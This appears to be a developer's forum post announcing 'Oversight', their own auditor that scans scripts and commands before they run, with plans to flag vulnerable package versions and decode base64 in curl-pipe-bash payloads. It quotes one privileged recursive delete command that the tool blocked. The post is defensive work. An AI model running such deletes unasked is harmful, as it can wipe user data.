I was cleaning my system last night running sudo rm -rf /var/cache/pacman/pkg/download-* to clear up some space after failed AUR package install.

I was so frustrated and tired at the situation I was in, that I completely forgot I had my own security auditor, Oversight, running in the background. It jumped in and blocked the command. That was quite a surprise to see it working.

I have spent so much time crafting the regex rules for system integrity that I managed to catch myself off guard executing a now way back command. It is one thing to test a security tool against dummy files, but having it stop me from nuking my own directory when I was focused on something else felt like a real success.

It is a first time I am sharing this the project. It is a distro-agnostic auditor designed to scan scripts and commands before they run.

Couple of days ago I pushed v0.3.5, which moves the logic to an external JSON rules engine and adds multi-line context awareness, so it shows you exactly which lines of code are risky before you hit enter. At the moment it can scan locally and from GitHub, Gist, or any raw URL.

I am moving into Phase 2 now. The plan is to integrate the OSV.dev API so it can flag known vulnerabilities in package versions, plus adding basic de-obfuscation for base64 payloads to see what is hidden in those curl pipe bash commands.

It feels like the project is starting to hold its own. Has anyone else experienced that weird satisfaction of being blocked by their own code?

If you are interested, you can check Oversight here: https://github.com/Rakosn1cek/oversight

Any feedback is welcome.